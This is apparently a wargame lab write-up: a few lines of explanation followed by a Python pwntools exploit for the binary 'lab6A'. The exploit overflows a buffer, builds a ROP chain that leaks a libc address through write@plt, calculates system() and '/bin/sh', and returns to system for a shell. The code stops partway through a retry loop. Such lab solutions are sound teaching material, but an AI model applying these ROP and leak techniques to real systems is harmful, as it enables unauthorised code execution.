ASLR + NX + PIE + Partial RELRO
make_note() is vulnerable.
Approach: return to plt. However, all the plt addresses are jumped to using edx. like [edx+0x20],[edx+0x3c] etc. So, we need to
load the correct value into edx. ROP for that. Then use write to leak a libc address. Then use offsets to calculate system
and the magic address ( which contains “/bin/sh” string already in the libc).
Then run the vulnerability again (ROP) and then do system().
Coded in python.
from pwn import *
'''overwrite sfunc with make_note and then call choice 3'''
#offset = 90
name = "A"*31 + "\n"
desc = "B"*90
#sfunc = "C"*4
sfunc = p32(0x565559af)
desc += sfunc
ropchain = "A"*52 #Overflow gets()
# write@plt --> make_note() --> p32(1) --> got.plt --> p32(4)
# got.plt = make_note + 9825
# pop ebx; ret
ropchain += p32(0x56555655)
ropchain += p32(0x56558000)
#ropchain +=
got = 0x565559af + 9817
#got = 0x565559af+4
write1 = 0x56555730
ropchain += p32(write1)
ret = 0x565559af
argument = p32(1)
argument += p32(got)
#argument += p32(got)
argument += p32(4)
ropchain += p32(ret)
ropchain += argument
ropchain += "\n"
desc += "\n"
def get_leak(b):
word = "0x"
word += b[6] + b[7]
word += b[4] + b[5]
word += b[2] + b[3]
word += b[0] + b[1]
print word
return word
def exploit():
sh1 = process("./lab6A")
# raw_input()
fg = sh1.recv()
# call make_note now.
a = sh1.recv()
find1 = "Note About"
if find1 in a:
#print a
raw_input("Press Enter to send ROP Chain!!")
# send ropchain now.
b = sh1.recvuntil("Make")
b = b.strip("Make")
b = b.encode("hex")
leak = get_leak(b)
leak = int(leak,16)
system_addr = leak - 1782112
sh_address = system_addr + 1182347
#print leak
raw_input("Enter to start attack phase 2")
ropchain2 = "A"*52
ropchain2 += p32(system_addr)
ropchain2 += "DUMY"
ropchain2 += p32(sh_address)
ropchain2 += "\n"
i = 0
while True:
i += 1
print "Try %d" %i